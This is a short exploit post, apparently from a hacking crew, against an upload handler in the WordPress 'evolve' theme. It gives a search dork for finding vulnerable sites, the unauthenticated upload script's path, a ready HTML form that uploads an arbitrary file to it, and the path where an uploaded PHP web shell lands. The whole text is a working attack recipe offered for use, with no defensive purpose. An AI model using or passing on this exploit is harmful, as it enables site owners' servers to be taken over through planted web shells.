Assalamuallaikum Wr.Wb
- #Author: People_hurt
- #Dork: inurl:"/wp-content/themes/evolve/js/"
- #Type: CSRF & Xampp ,Uploadify
- #Tested:-
- #CMS:WordPress
- Indonesian Cyber Freedom | SlemanGetar
Vulnerability: /wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php
{"error":"No files were uploaded."}
CSRF:
<form enctype="multipart/form-data"
action="Co.il/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
Shell Location :
/wp-contents/uploads/2015/03/IcalSadega.php
Credits : PriaPolos - Extreme Crew
